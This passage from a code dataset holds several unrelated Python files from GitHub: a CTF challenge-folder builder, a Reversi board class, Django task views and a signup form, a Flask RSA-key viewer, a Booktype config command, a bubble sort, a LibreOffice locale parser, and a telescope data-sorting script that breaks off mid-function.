specify both flag and flags\")\n \n if flag is not None:\n flags = [Flag(flag=flag)]\n\n if flags is not None:\n flags = [Flag(**flag) for flag in flags]\n\n if hints is not None:\n hints = [Hint(**hint) for hint in hints]\n \n dist = files is not None\n service = services is not None\n\n path = create_challenge_folder(name, dist=dist, service=service)\n\n if files is not None:\n # Copy files to dist folder\n file_paths = []\n for file in files:\n file_path = shutil.copy(file, path / \"dist\")\n file_path = Path(file_path).relative_to(path)\n file_paths.append(file_path.as_posix())\n else:\n file_paths = None\n\n if services is not None:\n # Copy services to service folder\n service_objs = []\n for service in services:\n service_path = path / \"service\" / service[\"name\"]\n shutil.copytree(service[\"path\"], service_path)\n service_obj = Service(service[\"name\"], path=service_path.relative_to(path).as_posix(), port=str(service[\"port\"]))\n service_objs.append(service_obj)\n else:\n service_objs = None\n\n # Copy solution files to solution folder\n for file in solution_files:\n shutil.copy(file, path / \"solution\")\n\n # Create challenge info\n info = ChallengeInfo(\n name=name,\n description=description,\n difficulty=difficulty,\n category=category,\n author=author,\n discord=discord,\n 
flags=flags,\n hints=hints,\n files=file_paths,\n requirements=requirements,\n services=service_objs\n )\n\n # Save challenge info in chall.yaml\n safe_dump(info.to_dict(), (path / \"chall.yaml\").open(\"w\"))\n\n # Create README.md\n (path / \"README.md\").write_text(create_challenge_readme(info))\n\n return path","repo_name":"Jus-Codin/CTF-Architect","sub_path":"ctf_architect/chall_architect/create.py","file_name":"create.py","file_ext":"py","file_size_in_byte":5613,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"69823134569","text":"\"\"\"Represents the Board of a Reversi game.\"\"\"\nimport json\nimport logging\n\n\nclass Square(object):\n \"\"\"Enum to differentiate between teams.\n\n Note: We don't extend from enum to allow for easy serialization.\n \"\"\"\n white = 0\n black = 1\n blank = 2\n\n\nclass Board(object):\n \"\"\"Represents the board of a reversi game.\"\"\"\n\n def __init__(self, size, board, turn):\n if size:\n self.board = [[Square.blank for _ in range(size)] for _ in range(size)]\n self.board[size/2][size/2] = self.board[size/2-1][size/2-1] = Square.white\n self.board[size/2][size/2-1] = self.board[size/2-1][size/2] = Square.black\n else:\n self.board = board\n self.turn = turn\n\n # Creating a new board\n @classmethod\n def makeboard(cls, size):\n return cls(size, None, Square.white)\n\n # Creating a board in progress\n @classmethod\n def remakeboard(cls, board, turn):\n return cls(None, board, turn)\n\n def to_json(self):\n \"\"\"Converts the board to json.\"\"\"\n return json.dumps(self.board)\n\n @staticmethod\n def from_json(data, turn):\n \"\"\"Parses a json board and returns a new Board object.\n\n Args:\n data: (str) The board, encoded as json.\n turn: (Square) The team set to move next\n\n Returns:\n Board: The recreated board.\n \"\"\"\n return Board.remakeboard(json.loads(data), turn)\n\n def get_size(self):\n \"\"\"Gets the size of a board side.\"\"\"\n return len(self.board)\n\n def get_num_moves(self):\n \"\"\"Gets the number of moves made in the game.\"\"\"\n return len(self.board) * len(self.board) - 4 - self.get_squares_left()\n\n def get_squares_left(self):\n \"\"\"Gets the number of blank squares on the board.\"\"\"\n remaining = 0\n for r in self.board:\n for c in r:\n if c == Square.blank:\n remaining += 1\n return remaining\n\n def get_turn(self):\n \"\"\"Returns whose turn it is.\"\"\"\n return self.turn\n\n def add_piece(self, r, c, team):\n \"\"\"Validates input and addes a piece to the board.\n\n Args:\n r: (int) The row.\n c: (int) The column.\n team: (Square) The team making the move.\n\n Returns:\n int: The number of points scored by the move\n \"\"\"\n if not self._validate_input(r, c, team):\n return 0\n points = self._flip(r, c, self.turn)\n if points == 0:\n logging.info('Illegal move r%sc%s: no points', r, c)\n return 0\n self.board[r][c] = self.turn\n self._set_next_turn()\n return points\n\n def _validate_input(self, r, c, team):\n \"\"\"Ensures move input is a legal move.\n\n Args:\n r: (int) The row.\n c: (int) The column.\n team: (Square) The team making the move.\n\n Returns:\n bool: the legality of the move\n \"\"\"\n if r < 0 or r >= len(self.board) or c < 0 or c >= len(self.board):\n logging.error('Move r%sc%s not in range 0, %s', r, c, len(self.board))\n elif self.turn != team:\n logging.info('Bad Move by player%s: Not your turn', team + 1)\n elif self.board[r][c] != Square.blank:\n logging.info('Bad Move r%sc%s: Not a blank square', r, c)\n else:\n return True\n 
return False\n\n def _set_next_turn(self):\n \"\"\"Determines if players can move and sets the next turn.\"\"\"\n\n # Check if each player can move\n cur_turn = self.turn\n self.turn = Square.black\n black_able = self.can_move(Square.black)\n self.turn = Square.white\n white_able = self.can_move(Square.white)\n self.turn = cur_turn\n if not black_able and not white_able:\n logging.info('No more legal moves')\n self.turn = Square.blank\n\n # Set next turn\n if self.turn == Square.white:\n self.turn = Square.black\n # Break up if statements so that our checks pass validate_input\n if not black_able:\n self.turn = Square.white\n elif self.turn == Square.black:\n self.turn = Square.white\n # Break up if statements so that our checks pass validate_input\n if not white_able:\n self.turn = Square.black\n\n # Method wrapper for flipping\n def _flip(self, r, c, team):\n return self._validate_flip(r, c, team, True, True)\n\n # Method wrapper for getting score of a potential flip\n def flip_score(self, r, c, team):\n if self._validate_input(r, c, team):\n return self._validate_flip(r, c, team, False, True)\n return 0\n\n # Method wrapper for seeing if move is legal. Returns Boolean\n def can_flip(self, r, c, team):\n logging.getLogger().setLevel(logging.ERROR) # Don't log validation errors\n if (self._validate_input(r, c, team) and\n self._validate_flip(r, c, team, False, False)):\n logging.getLogger().setLevel(logging.DEBUG)\n return True\n logging.getLogger().setLevel(logging.DEBUG)\n return False\n\n # Internal method for flipping pieces\n # Assumes everything has been validated\n def _flip_pieces(self, pieces):\n for piece in pieces:\n if self.board[piece[0]][piece[1]] == Square.white:\n self.board[piece[0]][piece[1]] = Square.black\n else:\n self.board[piece[0]][piece[1]] = Square.white\n\n # Internal method for determining move legality and score\n def _validate_flip(self, r, c, team, should_flip, keep_score):\n \"\"\"Handles validating moves and flipping pieces.\n\n Args:\n r: (int) The row we're placing a piece.\n c: (int) The column we're placing a piece.\n team: (Square) The team placing the piece.\n should_flip: (bool) Should we actually flip the pieces or just check move?\n keep_score: (bool) Are we checking legality or score?\n\n Returns:\n int: The move's score (or 1 for score >= 1 if keep_score is false)\n \"\"\"\n flip_pieces = []\n # Search each direction on the board\n for dr in xrange(-1, 2):\n for dc in xrange(-1, 2):\n if dr == 0 and dc == 0:\n continue\n cur_r = r + dr\n cur_c = c + dc\n found_other = False\n while (cur_r < len(self.board) and cur_r >= 0 and\n cur_c < len(self.board[0]) and cur_c >= 0):\n if self.board[cur_r][cur_c] == Square.blank:\n break\n elif self.board[cur_r][cur_c] == team:\n # If we found the other player in between, flip. 
Otherwise break\n if found_other:\n if keep_score:\n # Calculate all the flipped pieces\n mv_r = -1 * dr\n mv_c = -1 * dc\n while cur_r + mv_r != r or cur_c + mv_c != c:\n cur_r += mv_r\n cur_c += mv_c\n flip_pieces.append([cur_r, cur_c])\n else:\n # If we're checking that this square has a legal move, it does\n return 1\n break\n else:\n found_other = True\n cur_r += dr\n cur_c += dc\n\n # Remove duplicate squares\n flip_set = set(tuple(i) for i in flip_pieces)\n if should_flip:\n self._flip_pieces(flip_set)\n return len(flip_set)\n\n def can_move(self, team):\n \"\"\"Determines if the given team has a valid move.\n\n Args:\n team: (Square) The team.\n\n Returns:\n bool: If the team has a valid move\n \"\"\"\n for r in xrange(0, len(self.board)):\n for c in xrange(0, len(self.board)):\n if self.can_flip(r, c, team):\n return True\n return False\n\n# Count Squares on a full board to determine the winner\n def who_won(self):\n \"\"\"Counts the squares on a board to determine the winner.\n\n Returns:\n Square: The winning team.\n \"\"\"\n white_advantage = 0\n\n if self.turn != Square.blank:\n return -1\n for r in xrange(len(self.board)):\n for c in xrange(len(self.board)):\n if self.board[r][c] == Square.white:\n white_advantage += 1\n elif self.board[r][c] == Square.black:\n white_advantage -= 1\n if white_advantage == 0:\n return Square.blank\n elif white_advantage > 0:\n return Square.white\n else:\n return Square.black\n\n # Count number of pieces that belong to the given team\n def num_pieces(self, team):\n pieces = 0\n for r in xrange(len(self.board)):\n for c in xrange(len(self.board)):\n if self.board[r][c] == team:\n pieces += 1\n return pieces\n\n","repo_name":"Benjamin-Marks/reversi","sub_path":"board.py","file_name":"board.py","file_ext":"py","file_size_in_byte":8100,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15162242876","text":"from datetime import datetime\nfrom dateutil import tz\nfrom django.contrib.auth.forms import UserCreationForm\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.contrib.auth.views import LoginView\nfrom django.db import transaction\nfrom django.forms import ModelForm\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.shortcuts import redirect, render\nfrom django.views import View\nfrom django.views.generic import ListView\nfrom django.views.generic.detail import DetailView\nfrom django.views.generic.edit import CreateView, DeleteView, UpdateView\n\nfrom tasks.models import *\n\nTIMEZONE = [tz for tz in pytz.all_timezones]\n\nclass AuthorisedTaskManager(LoginRequiredMixin):\n def get_queryset(self):\n return Task.objects.filter(deleted=False, user=self.request.user)\n\n\nclass UserLoginView(LoginView):\n template_name = \"user_login.html\"\n\n\nclass UserCreateView(CreateView):\n form_class = UserCreationForm\n template_name = \"user_create.html\"\n success_url = \"/user/login/\"\n\n\ndef session_storage_view(request):\n total_views = request.session.get(\"total_views\", 0)\n request.session[\"total_views\"] = total_views + 1\n return HttpResponse(f\"Total views: {total_views} and user is {request.user}\")\n\n\nclass GenericTaskDeleteView(AuthorisedTaskManager, DeleteView):\n model = Task\n template_name = \"task_delete.html\"\n success_url = \"/tasks\"\n\n\nclass GenericTaskDetailView(AuthorisedTaskManager, DetailView):\n model = Task\n template_name = \"task_detail.html\"\n\n\nclass GenericTaskUpdateView(AuthorisedTaskManager, UpdateView):\n 
model = Task\n template_name = \"task_update.html\"\n fields = [\"title\", \"description\", \"priority\", \"completed\", \"status\"]\n success_url = \"/tasks\"\n\n def form_valid(self, form):\n # print(form.cleaned_data)\n self.object = form.save()\n self.object.user = self.request.user\n priority = self.object.priority\n tasks = (\n Task.objects.filter(\n priority__gte=priority,\n user=self.request.user,\n deleted=False,\n completed=False,\n )\n .select_for_update()\n .order_by(\"priority\")\n )\n\n for task in tasks:\n if task.priority <= priority:\n task.priority += 1\n priority += 1\n\n Task.objects.bulk_update(tasks, [\"priority\"])\n self.object.save()\n print(self.object)\n return HttpResponseRedirect(self.get_success_url())\n\n\nclass GenericTaskCreateView(CreateView):\n model = Task\n fields = (\"title\", \"description\", \"priority\", \"completed\", \"status\")\n template_name = \"task_create.html\"\n success_url = \"/tasks\"\n\n def form_valid(self, form):\n self.object = form.save()\n self.object.user = self.request.user\n priority = self.object.priority\n tasks = (\n Task.objects.filter(\n priority__gte=priority,\n user=self.request.user,\n deleted=False,\n completed=False,\n )\n .select_for_update()\n .order_by(\"priority\")\n )\n\n for task in tasks:\n if task.priority <= priority:\n task.priority += 1\n priority += 1\n\n Task.objects.bulk_update(tasks, [\"priority\"])\n self.object.save()\n return HttpResponseRedirect(self.get_success_url())\n\n\nclass GenericTaskView(LoginRequiredMixin, ListView):\n queryset = Task.objects.filter(deleted=False)\n template_name = \"tasks.html\"\n context_object_name = \"tasks\"\n\n def get_queryset(self):\n search_term = self.request.GET.get(\"search\")\n tasks = Task.objects.filter(deleted=False, user=self.request.user)\n completed = Task.objects.filter(\n deleted=False, user=self.request.user, completed=True\n )\n if search_term:\n tasks = tasks.filter(title__icontains=search_term)\n return tasks, completed\n\n\nclass EmailTaskView(LoginRequiredMixin, View):\n def get(self, request, *args, **kwargs):\n mail = self.request.user.email\n time = (\n EmailReport.objects.get(user=self.request.user).time\n if EmailReport.objects.filter(user=self.request.user).exists()\n else None\n )\n timezone = (\n EmailReport.objects.get(user=self.request.user).time_zone\n if EmailReport.objects.filter(user=self.request.user).exists()\n else 'UTC'\n )\n if timezone != 'UTC':\n # convert time to UTC\n print(time)\n time = str(time)\n time = datetime.strptime(time, \"%H:%M:%S\")\n time = time.replace(tzinfo=tz.gettz(timezone))\n time = time.astimezone(tz.gettz('UTC'))\n time = time.strftime(\"%H:%M:%S\")\n time = datetime.strptime(time, \"%H:%M:%S\")\n\n\n return render(\n request,\n \"email.html\",\n {\"time\": time, \"mail\": mail, \"timezones\": TIMEZONE, \"tz\": timezone},\n )\n\n def post(self, request):\n time = self.request.POST.get(\"time\")\n timezone = self.request.POST.get(\"timezone\")\n with transaction.atomic():\n report = EmailReport.objects.get_or_create(\n user=request.user\n )[0]\n # time to YYYY-MM-DD HH:MM[:ss[.uuuuuu]][TZ] from HH:MM\n time = datetime.strptime(time, \"%H:%M\")\n # time to django timezone\n timezone = pytz.timezone(timezone)\n local_dt = timezone.localize(time, is_dst=None)\n time = local_dt.astimezone(pytz.utc)\n report.time_zone = timezone\n report.time = time\n report.save()\n user = User.objects.get(id=self.request.user.id)\n user.email = self.request.POST.get(\"email\")\n print(user.email)\n user.save()\n return 
redirect(\"/\")\n","repo_name":"kingjuno/GDC22","sub_path":"GDC-Level-9-Milestone-master/tasks/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17491548740","text":"from flask import Flask, render_template, request, redirect, url_for, flash\nfrom load_keys import get_details, is_validate\n\napp = Flask(__name__)\napp.secret_key = b'_5#y2L\"F4Q8z\\n\\xec]/'\n\n@app.route(\"/\", methods=('GET', 'POST'))\ndef index():\n if request.method == 'POST':\n # Tipo de llave\n type_key = request.form['typeKey']\n # Recibimos el archivo\n uploaded_file = request.files['file']\n\n # Si el archivo ha sido cargado y el tipo de llave ha sido especificado\n if type_key != '' and uploaded_file != b'':\n # Leemos el archivo\n file_bytes = uploaded_file.stream.read()\n\n # Validamos llave RSA\n is_validate_file = is_validate(file_bytes)\n if is_validate_file[0] == True:\n # Obtenemos resultados\n details_dic = get_details(type_key, file_bytes)\n return render_template(\"results.html\", details_dic = details_dic, type_key=type_key.title())\n else:\n flash(is_validate_file[1], 'danger')\n return redirect(url_for(\"index\"))\n\n return render_template(\"index.html\")\n\nif __name__ == '__main__':\n app.run(debug=True)","repo_name":"sharon1160/rsa-key-viewer","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1091,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30903867260","text":"import json\n\nfrom django.core.management.base import BaseCommand, CommandError\nfrom django.conf import settings\n\nfrom booktype.utils import config\n\n\nclass Command(BaseCommand):\n help = \"Set value for configuration variable.\"\n\n def add_arguments(self, parser):\n parser.add_argument(\" \", nargs=2, type=str)\n parser.add_argument('--as_json',\n action='store_true',\n dest='as_json',\n default=False,\n help='Value is defined as JSON encoded string.')\n parser.add_argument('--integer',\n action='store_true',\n dest='integer',\n default=False,\n help='Value is a integer.')\n parser.add_argument('--float',\n action='store_true',\n dest='float',\n default=False,\n help='Value is a float.')\n parser.add_argument('--append',\n action='store_true',\n dest='append',\n default=False,\n help='Append value to the end of list.')\n parser.add_argument('--remove',\n action='store_true',\n dest='remove',\n default=False,\n help='Remove value from the list.')\n\n requires_model_validation = False\n\n def handle(self, *args, **options):\n if not hasattr(settings, 'BOOKTYPE_CONFIG'):\n raise CommandError('Does not have BOOKTYPE_CONFIG in settings.py file.')\n\n if len(options[' ']) != 2:\n raise CommandError(\"You must specify variable name and value.\")\n\n key = options[' '][0]\n value = options[' '][1]\n\n if options['integer']:\n try:\n value = int(value)\n except ValueError:\n raise CommandError(\"I don't think this %s is a number!\" % value)\n\n if options['float']:\n try:\n value = float(value)\n except ValueError:\n raise CommandError(\"I don't think this %s is a number!\" % value)\n\n if options['as_json']:\n try:\n value = json.loads(value)\n except ValueError:\n raise CommandError(\"Not a valid JSON string.\")\n\n if options['append']:\n # ovo neshto ne radi sa as_jsonom\n lst = config.get_configuration(key, [])\n\n if type(lst) == type([]):\n lst.append(value)\n config.set_configuration(key, lst)\n else:\n raise 
CommandError(\"Can not append to something that is not a list\")\n elif options['remove']:\n lst = config.get_configuration(key, [])\n\n if type(lst) == type([]):\n try:\n lst.remove(value)\n except ValueError:\n raise CommandError(\"I can't see it!\")\n\n config.set_configuration(key, lst)\n else:\n raise CommandError(\"Can not append to something that is not a list\")\n else:\n config.set_configuration(key, value)\n\n try:\n config.save_configuration()\n except config.ConfigurationError:\n raise CommandError(\"Could not save the file.\")\n","repo_name":"booktype/Booktype","sub_path":"lib/booki/editor/management/commands/confset.py","file_name":"confset.py","file_ext":"py","file_size_in_byte":3541,"program_lang":"python","lang":"en","doc_type":"code","stars":894,"dataset":"github-code","pt":"53"} +{"seq_id":"39703688473","text":"import sys\n\ndef bubbleSort(arr, n):\n \n # Traverse through all array elements\n for i in range(n):\n \n # Last i elements are already in place\n for j in range(0, n-i-1):\n \n # traverse the array from 0 to n-i-1\n # Swap if the element found is greater\n # than the next element\n if arr[j] > arr[j+1]:\n arr[j], arr[j+1] = arr[j+1], arr[j]\n\n\narr = []\nn = -1\nflag = 0\nfile1 = open('../test-case-analysis-prototype/test-cases/'+sys.argv[1], 'r')\nLines = file1.readlines()\nfor line in Lines:\n curr_line = line.strip()\n # print(curr_line)\n converted_num = int(curr_line)\n # print(converted_num)\n if(flag==0):\n flag = 1\n n = converted_num\n else:\n arr.append(converted_num)\n\n#arr= [1, 2, 3, 4, 5]\n# n = len(arr)\n# print (\"Given array is\")\n# for i in range(0, n):\n# \tprint (arr[i], end = ' ')\n\nbubbleSort(arr, n)\n\n# print (\"\\nRotated array is\")\n# for i in range(0, n):\n# \tprint (arr[i], end = ' ')\n\nfile1 = open('../test-case-analysis-prototype/output.txt', 'w')\nfor i in range(0, n):\n\t# print (arr[i], end = ' ')\n converted_arr_i = str(arr[i])\n file1.writelines(converted_arr_i)\n file1.writelines('\\n')\n# file1.writelines(L)\nfile1.close()\n","repo_name":"cs19b048iittp/Code-Clone-Detection-Using-Metrics","sub_path":"vs-code-extension-trial/code-clone-analysis/type_4/test-case-analysis-prototype/BubbleSort.py","file_name":"BubbleSort.py","file_ext":"py","file_size_in_byte":1251,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11967437373","text":"import sys\nimport xml.etree.ElementTree as ET\nfrom pathlib import Path\nimport collections\n\nif len(sys.argv) != 2:\n raise Exception(\"First arg should be a path to i18npool/source/localedata/data directory of LibreOffice.\")\nelse:\n source = sys.argv[1]\n\ntrue_false_by_locale = {}\nnumber_seps = collections.Counter()\ndatetime_seps = collections.Counter()\ncurr_codes = collections.Counter()\ncurr_symbols = collections.Counter()\nnames_by_datecode_by_locale = {}\n\nfor source in Path(source).glob(\"*.xml\"):\n tree = ET.parse(source)\n root = tree.getroot()\n for separators in root.findall(\"./LC_MISC/ReservedWords\"):\n true_false_by_locale[source.stem] = (\n separators.find(\"trueWord\").text.casefold(),\n separators.find(\"falseWord\").text.casefold())\n for separators in root.findall(\"./LC_CTYPE/Separators\"):\n number_seps[separators.find(\"ThousandSeparator\").text.casefold()] += 1\n number_seps[separators.find(\"DecimalSeparator\").text.casefold()] += 1\n datetime_seps[separators.find(\"DateSeparator\").text.casefold()] += 1\n datetime_seps[separators.find(\"TimeSeparator\").text.casefold()] += 1\n\n for separators in 
root.findall(\"./LC_CURRENCY/Currency\"):\n curr_symbols[separators.find(\"CurrencySymbol\").text.casefold()] += 1\n curr_codes[separators.find(\"CurrencyID\").text.casefold()] += 1\n\n name_by_datecode = names_by_datecode_by_locale.setdefault(source.stem, {})\n for day in root.findall(\"./LC_CALENDAR/Calendar/DaysOfWeek/Day\"):\n name_by_datecode.setdefault(\"day\", set()).add(\n day.find(\"DefaultFullName\").text.casefold()),\n name_by_datecode.setdefault(\"dy\", set()).add(\n day.find(\"DefaultAbbrvName\").text.casefold())\n\n for month in root.findall(\"./LC_CALENDAR/Calendar/MonthsOfYear/Month\"):\n name_by_datecode.setdefault(\"month\", []).append(\n month.find(\"DefaultFullName\").text.casefold()),\n name_by_datecode.setdefault(\"mon\", []).append(\n month.find(\"DefaultAbbrvName\").text.casefold())\n\nprint(\"\"\"# coding: utf-8\n\n# Data is retrieved from LibreOffice:\n# https://github.com/LibreOffice/core/tree/master/i18npool/source/localedata/data\n\"\"\")\n\nprint(\"TRUE_FALSE_BY_LOCALE_NAME = {\")\nfor k, (t, f) in sorted(true_false_by_locale.items()):\n print(f\" {repr(k)}: ({repr(t)}, {repr(f)}),\")\nprint(\"}\")\n\nfor constant, counter in [(\"NUMBER_SEPARATORS\", number_seps),\n (\"DATETIME_SEPARATORS\", datetime_seps),\n (\"CURRENCY_SYMBOLS\", curr_symbols),\n (\"CURRENCY_CODES\", curr_codes),\n ]:\n print()\n print(f\"{constant} = {{\")\n print(\", \".join(repr(sep) for sep, _c in counter.most_common()))\n print(\"}\")\n\nprint(\"PERCENTAGE_SIGNS = {\\\"%\\\"}\")\n\nprint()\nprint(\"NAMES_BY_DATECODE_BY_LOCALE = {\")\nfor locale, names_by_datecode in names_by_datecode_by_locale.items():\n print(f\" {repr(locale)}: {{\")\n for datecode, names in names_by_datecode.items():\n names = \", \".join(repr(n) for n in names)\n print(f\" {repr(datecode)}: {{{names}}},\")\n print(\" },\")\nprint(\"}\")\n","repo_name":"jferard/ColumnDet","sub_path":"parse_lo_i18n.py","file_name":"parse_lo_i18n.py","file_ext":"py","file_size_in_byte":3151,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27205423875","text":"from django import forms\nfrom django.contrib.auth.forms import UserCreationForm\nfrom django.contrib.auth.models import User\nfrom django.core.exceptions import ValidationError\n\n\nclass UserCreationForm(UserCreationForm):\n email = forms.EmailField(required=True, label='email')\n\n class Meta:\n model = User\n fields = (\"username\", \"email\", \"password1\", \"password2\")\n\n # Checking that an email doesn't exist\n def clean(self):\n email = self.cleaned_data.get('email')\n if User.objects.filter(email=email).exists():\n raise ValidationError(\"Email exists\")\n return self.cleaned_data\n\n # Committing the cleaned data\n def save(self, commit=True):\n user = super(UserCreationForm, self).save(commit=False)\n user.email = self.cleaned_data[\"email\"]\n if commit:\n user.save()\n return user\n","repo_name":"BAZZM/Circulate","sub_path":"src/accounts/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":873,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"86738030993","text":"from pyraf import iraf\nimport pyfits, string, os, glob\n\nfrom saltsafekey import fastmode\n\nimport saltsafeio as saltio\nimport saltsafekey as saltkey\nimport saltsafestring as saltstring\nfrom saltsafelog import logging\nfrom salterror import SaltError, SaltIOError\n\ndebug=True\n\n# -----------------------------------------------------------\n# core routine\n\ndef 
saltobsid(propcode,obslog,rawpath,prodpath,outpath,prefix='mbxgp', fprefix='bxgp',clobber=False,logfile='salt.log',verbose=True):\n \"\"\"Split data into their different data directories\n \"\"\"\n\n\n with logging(logfile,debug) as log:\n\n # are the arguments defined\n pids = saltio.argunpack('propcode',propcode)\n\n # check observation log file exists\n obslog = obslog.strip()\n saltio.fileexists(obslog)\n\n #open the observing log\n obstruct = saltio.openfits(obslog)\n obstab = saltio.readtab(obstruct[1],obslog)\n saltio.closefits(obstruct)\n\n #read in the file information\n filenames = saltstring.listfunc(obstab.field('filename'),'lstrip')\n instrumes = saltstring.listfunc(obstab.field('instrume'),'lstrip')\n proposers = saltstring.listfunc(obstab.field('proposer'),'clean')\n propids = saltstring.listfunc(obstab.field('propid'),'clean')\n ccdtypes = saltstring.listfunc(obstab.field('ccdtype'),'clean')\n ccdsums = saltstring.listfunc(obstab.field('ccdsum'),'clean')\n gainsets = saltstring.listfunc(obstab.field('gainset'),'clean')\n rospeeds = saltstring.listfunc(obstab.field('rospeed'),'clean')\n detmodes = saltstring.listfunc(obstab.field('detmode'),'clean')\n filters = saltstring.listfunc(obstab.field('filter'),'clean')\n gratings = saltstring.listfunc(obstab.field('grating'),'clean')\n gr_angles = obstab.field('gr-angle')\n ar_angles = obstab.field('ar-angle')\n \n # Create the list of proposals\n try:\n pids=saltio.cleanpropcode(pids, propids)\n except SaltIOError:\n #throw a warning adn exit if not data needs to be filterd\n log.warning('No data to filter\\n', with_stdout=verbose)\n return\n\n # check paths exist, end with a \"/\" and convert them to absolute paths\n rawpath = saltio.abspath(rawpath)\n prodpath = saltio.abspath(prodpath)\n outpath = saltio.abspath(outpath)\n\n #create the symlink raw path\n rawsplit=rawpath.strip().split('/')\n symrawpath='../../%s/%s/' % (rawsplit[-3], rawsplit[-2])\n prodsplit=prodpath.strip().split('/')\n symprodpath='../../%s/%s/' % (prodsplit[-3], prodsplit[-2])\n \n\n # create PI directories\n for pid in pids:\n saltio.createdir(outpath+pid)\n saltio.createdir(outpath+pid+'/raw')\n saltio.createdir(outpath+pid+'/product')\n\n #copy the data that belongs to a pid into that directory\n log.message('SALTOBSID -- filtering images to proposal directories\\n', with_stdout=verbose)\n\n #copy data for a given proposal to the raw and produce directories\n for i in range(len(obstab)):\n if os.path.exists(outpath+obstab[i]['propid']):\n if obstab[i]['object'].upper() not in ['ZERO', 'BIAS']:\n fname=obstab[i]['filename']\n pdir=obstab[i]['propid']\n detmode=obstab[i]['detmode']\n linkfiles(fname, pdir,detmode, symrawpath, symprodpath, outpath, prefix, fprefix, clobber)\n message='Copying %s to %s' % (fname, pdir)\n log.message(message, with_header=False, with_stdout=verbose)\n\n #look through the bias/flat/arc/standard data to see if there is any relavent data\n log.message('SALTOBSID -- filtering calibration files to proposal directories\\n', with_stdout=verbose)\n\n caldata=['ZERO', 'FLAT', 'ARC']\n biasheader_list=['DETMODE', 'CCDSUM', 'GAINSET', 'ROSPEED']\n flatheader_list=['DETMODE', 'CCDSUM', 'GAINSET', 'ROSPEED', 'FILTER', 'GRATING', 'GR-ANGLE', 'AR-ANGLE']\n archeader_list=['OBSMODE', 'DETMODE', 'CCDSUM', 'GAINSET', 'ROSPEED', 'FILTER', 'GRATING', 'GR-ANGLE', 'AR-ANGLE']\n \n calproplist=['CAL_SPST']\n #Include bias frames\n log.message('SALTOBSID -- filtering bias files to proposal directories\\n', with_stdout=verbose)\n\n for i in 
range(len(obstab)):\n fname=obstab[i]['filename']\n prop_list=[]\n #if it is a zero, check to see what other data have the same settings \n if obstab[i]['CCDTYPE'].strip().upper()=='ZERO' or obstab[i]['OBJECT'].strip().upper() in ['BIAS', 'ZERO']:\n for j in range(len(obstab)):\n if comparefiles(obstab[i], obstab[j], biasheader_list):\n prop_list.append(obstab[i]['PROPID'])\n\n prop_list=saltio.removebadpids(set(prop_list))\n for pdir in prop_list:\n detmode=obstab[i]['detmode']\n linkfiles(fname, pdir, detmode, symrawpath, symprodpath, outpath, fprefix, fprefix, clobber)\n message='Copying %s to %s' % (fname, pdir)\n log.message(message, with_header=False, with_stdout=verbose)\n\n #Include calibration frames\n log.message('SALTOBSID -- filtering calibration files to proposal directories\\n', with_stdout=verbose)\n \n for i in range(len(obstab)):\n fname=obstab[i]['filename']\n prop_list=[]\n\n #if it is a flat, check to see what other data have the same settings \n #this is turned off\n if obstab[i]['CCDTYPE'].strip().upper()=='FLAT' and False:\n for j in range(len(obstab)):\n if comparefiles(obstab[i], obstab[j], flatheader_list):\n prop_list.append(obstab[j]['PROPID'])\n\n #if it is a arc, check to see what other data have the same settings \n #this is turned off\n if obstab[i]['CCDTYPE'].strip().upper()=='ARC' and False:\n for j in range(len(obstab)):\n if comparefiles(obstab[i], obstab[j], archeader_list):\n prop_list.append(obstab[j]['PROPID'])\n\n\n #if it is a calibration standard, see what other data have the same settings\n if obstab[i]['PROPID'].strip().upper() in calproplist:\n for j in range(len(obstab)):\n if comparefiles(obstab[i], obstab[j], flatheader_list):\n prop_list.append(obstab[j]['PROPID'])\n\n\n prop_list=saltio.removebadpids(set(prop_list))\n for pdir in prop_list:\n if pdir!=obstab[i]['propid']:\n detmode=obstab[i]['detmode']\n linkfiles(fname, pdir, detmode, symrawpath, symprodpath, outpath, prefix, fprefix, clobber)\n message='Copying %s to %s' % (fname, pdir)\n log.message(message, with_header=False, with_stdout=verbose)\n\n #Include master (bias or flat) frames\n log.message('SALTOBSID -- filtering master calibration files to proposal directories\\n', with_stdout=verbose)\n masterlist=glob.glob(prodpath+'*Bias*')+glob.glob(prodpath+'*Flat*')\n for bimg in masterlist:\n struct=pyfits.open(bimg)\n bdict={}\n prop_list=[]\n for k in biasheader_list:\n bdict[k]=saltkey.get(k, struct[0])\n for i in range(len(obstab)):\n if comparefiles(obstab[i], bdict, biasheader_list):\n prop_list.append(obstab[i]['PROPID'])\n struct.close()\n\n #copy the files over to the directory\n prop_list=saltio.removebadpids(set(prop_list))\n for pdir in prop_list:\n fname=os.path.basename(bimg)\n infile = symprodpath+fname\n link = outpath+pdir+'/product/'+fname\n saltio.symlink(infile,link,clobber)\n message='Copying %s to %s' % (fname ,pdir)\n log.message(message, with_header=False, with_stdout=verbose)\n\n \n\n\ndef comparefiles(afile, bfile, headers):\n \"\"\"Compare the headers in two sets of tab entries\n and see if they are the same or different\n \"\"\"\n for k in headers:\n if isinstance(afile[k], str):\n if afile[k].strip().upper()!=bfile[k].strip().upper(): return False\n if isinstance(afile[k], int):\n if afile[k]==bfile[k]: return False\n if isinstance(afile[k], float):\n if abs(afile[k]-bfile[k])>0.01: return False\n return True\n\ndef linkfiles(fname, pdir, detmode, rawpath, prodpath, outpath, prefix='mbxgp', fprefix='bxgp', clobber=False):\n\n #copy the raw data\n 
